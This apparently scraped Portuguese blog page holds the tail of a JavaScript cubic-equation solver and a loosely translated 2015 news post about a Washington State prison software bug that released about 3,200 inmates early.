     var a = parseFloat(dataForm.aIn.value);   
     var b = parseFloat(dataForm.bIn.value);   
     var c = parseFloat(dataForm.cIn.value);   
     var d = parseFloat(dataForm.dIn.value);   
     if (a == 0){   
      alert("O coeficiente do cubo não pode ser 0.");   
      return;   
     } //End if a == 0   
     if (d == 0){   
      alert("Bem, uma raiz eh 0. Divida a equacao polinomial por x e você tem uma equacao do segundo grau. Aqui nada mais ha a ser feito.");   
      return;   
     } //End if d == 0   
     b /= a;   
     c /= a;   
     d /= a;   
     var discrim, q, r, dum1, s, t, term1, r13;   
     q = (3.0*c - (b*b))/9.0;   
     r = -(27.0*d) + b*(9.0*c - 2.0*(b*b));   
     r /= 54.0;   
     discrim = q*q*q + r*r;   
     dataForm.x1Im.value = 0; //A primeira raiz é sempre real.   
     term1 = (b/3.0);   
     if (discrim > 0) { // uma real, duas imaginarias   
      s = r + Math.sqrt(discrim);   
      s = ((s < 0) ? -Math.pow(-s, (1.0/3.0)) : Math.pow(s, (1.0/3.0)));   
      t = r - Math.sqrt(discrim);   
      t = ((t < 0) ? -Math.pow(-t, (1.0/3.0)) : Math.pow(t, (1.0/3.0)));   
      dataForm.x1Re.value = -term1 + s + t;   
      term1 += (s + t)/2.0;   
      dataForm.x3Re.value = dataForm.x2Re.value = -term1;   
      term1 = Math.sqrt(3.0)*(-t + s)/2;   
      dataForm.x2Im.value = term1;   
      dataForm.x3Im.value = -term1;   
      return;   
     } // End if (discrim > 0)   
     dataForm.x3Im.value = dataForm.x2Im.value = 0;   
     if (discrim == 0){ // Todas as raizes sao reais.   
      r13 = ((r < 0) ? -Math.pow(-r,(1.0/3.0)) : Math.pow(r,(1.0/3.0)));   
      dataForm.x1Re.value = -term1 + 2.0*r13;   
      dataForm.x3Re.value = dataForm.x2Re.value = -(r13 + term1);   
      return;   
     } // End if (discrim == 0)   
     // Opcao deixada para onde todas as raizes sao reais e distintas (q < 0)   
     q = -q;   
     dum1 = q*q*q;   
     dum1 = Math.acos(r/Math.sqrt(dum1));   
     r13 = 2.0*Math.sqrt(q);   
     dataForm.x1Re.value = -term1 + r13*Math.cos(dum1/3.0);   
     dataForm.x2Re.value = -term1 + r13*Math.cos((dum1 + 2.0*Math.PI)/3.0);   
     dataForm.x3Re.value = -term1 + r13*Math.cos((dum1 + 4.0*Math.PI)/3.0);   
     return;   
     } //FIM do Resolve   
     // by Bruh   
     // end of JavaScript-->   
    



    Ver mais
          edit

    quarta-feira, 30 de dezembro de 2015

    Publicado quarta-feira, dezembro 30, 2015 por com 0 comentário

    Autoridades de presídio soltaram 3.200 prisioneiros devido a um bug no Software



    O Departamento de Estado de Correções (DOC), em Washington, está enfrentando uma investigação depois que cerca de 3.200 prisioneiros foram soltos ao longo de 13 anos, desde 2002, quando um bug foi introduzido no software usado para calcular créditos de "tempo", por bom comportamento dos presos.

    A falha de software levou a um erro de cálculo de reduções de pena que os prisioneiros norte-americanos estavam recebendo por seu bom comportamento.

    Ao longo dos próximos 13 anos, o número médio de dias daqueles lançado no início da prisão foi de 49 dias antes da sua data de lançamento correto.

    "Esse problema foi autorizado a continuar por 13 anos é profundamente decepcionante para mim, totalmente inaceitável e, francamente, enlouquecedora", disse o governador do Estado de Washington Jay Inslee em um comunicado. "Eu tenho [muitos] perguntas sobre como e por que isso aconteceu, e eu entendo que os membros do público terão essas mesmas perguntas."

    Qual é o Bug e Como foi passar despercebido por 13 anos?

    O problema reside no software DoC que é usado para calcular a data de lançamento para os presos que apresentaram bom comportamento enquanto estava preso.

    O bug software foi introduzido em 2002, quando a Suprema Corte do estado implementou uma mudança para o sistema de crédito "bom tempo", permitindo que os prisioneiros ganhassem créditos por bom comportamento enquanto eles estão em:
    • Prisões do Estado
    • Cadeias municipais
    Esses créditos são usados ​​para encurtar a duração da pena do prisioneiro. Para aplicar essas mudanças, o Google Docs divulgou nos Estados Unidos as novas versões do software, mas, infelizmente, o código de penas de prisão calculados estava com defeito.

    DoC - Informados da emissão de 3 anos atrás

    O que é ainda mais decepcionante é que as autoridades soube do erro em dezembro de 2012, quando a família de uma vítima de assalto, tinha alertado que o atacante estava indo para a cadeia, mas iria ser libertado muito em breve.

    Naquela época, DoC entrou com um pedido, rotulando o erro como "sensíveis ao tempo" e para ser implementado o mais rapidamente possível.

    No entanto, o DoC  contratou um novo gerente de TI em novembro, que alertou as autoridades de quão sério é o bug. Inslee assegura que uma correção integral para o bug é esperado para ser lançado até o dia 7 de janeiro.

    Até então, o DoC foi ordenado a não liberar qualquer prisioneiro sem verificar manualmente a sua data de lançamento real.

    A notícia não é nada boa para esses prisioneiros que foram soltos prematuramente. As autoridades disseram que eles deverão cumprir o resto de suas sentenças. A parte boa é que eles receberão créditos de bom comportamento pelos dias que passaram fora da prisão sem causar problemas.
    Ver mais
          edit